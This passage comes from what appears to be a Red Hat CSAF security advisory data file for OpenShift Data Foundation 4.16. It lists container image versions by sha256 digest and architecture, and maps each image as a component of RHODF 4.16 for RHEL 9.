"pkg:oci/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e?arch=arm64&repository_url=registry.redhat.io/odf4/mcg-core-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", product: { name: "odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", product_id: "odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", product_identification_helper: { purl: "pkg:oci/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2?arch=arm64&repository_url=registry.redhat.io/odf4/mcg-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", product: { name: "odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", product_id: "odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", product_identification_helper: { purl: "pkg:oci/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8?arch=arm64&repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", product: { name: "odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", product_id: "odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", product_identification_helper: { purl: "pkg:oci/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f?arch=arm64&repository_url=registry.redhat.io/odf4/ocs-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", product: { name: "odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", product_id: "odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", product_identification_helper: { purl: "pkg:oci/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121?arch=arm64&repository_url=registry.redhat.io/odf4/odf-cli-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", product: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", product_id: "odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0?arch=arm64&repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", product: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", product_id: "odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235?arch=arm64&repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", product: { name: "odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", product_id: "odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", product_identification_helper: { purl: "pkg:oci/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8?arch=arm64&repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", product: { name: "odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", product_id: "odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", product_identification_helper: { purl: "pkg:oci/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57?arch=arm64&repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", product: { name: "odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", product_id: "odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", product_identification_helper: { purl: "pkg:oci/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b?arch=arm64&repository_url=registry.redhat.io/odf4/odf-rhel9-operator&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", product: { name: "odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", product_id: "odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", product_identification_helper: { purl: "pkg:oci/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb?arch=arm64&repository_url=registry.redhat.io/odf4/odr-rhel9-operator&tag=v4.16.3-1", }, }, }, ], category: "architecture", name: "arm64", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", }, product_reference: "odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", }, product_reference: "odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", }, product_reference: "odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", }, product_reference: "odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", }, product_reference: "odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", }, product_reference: "odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", }, product_reference: "odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", }, product_reference: "odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", }, product_reference: "odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", }, product_reference: "odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", }, product_reference: "odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", }, product_reference: "odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", }, product_reference: "odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", }, product_reference: "odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", }, product_reference: "odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", }, product_reference: "odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", }, product_reference: "odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", }, product_reference: "odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", }, product_reference: "odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", }, product_reference: "odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", }, product_reference: "odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", }, product_reference: "odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", }, product_reference: "odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", }, product_reference: "odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", }, product_reference: "odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", }, product_reference: "odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", }, product_reference: "odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", }, product_reference: "odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", }, product_reference: "odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", }, product_reference: "odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", }, product_reference: "odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", }, product_reference: "odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", }, product_reference: "odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", }, product_reference: "odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", }, product_reference: "odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", }, product_reference: "odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", }, product_reference: "odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", }, product_reference: "odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: 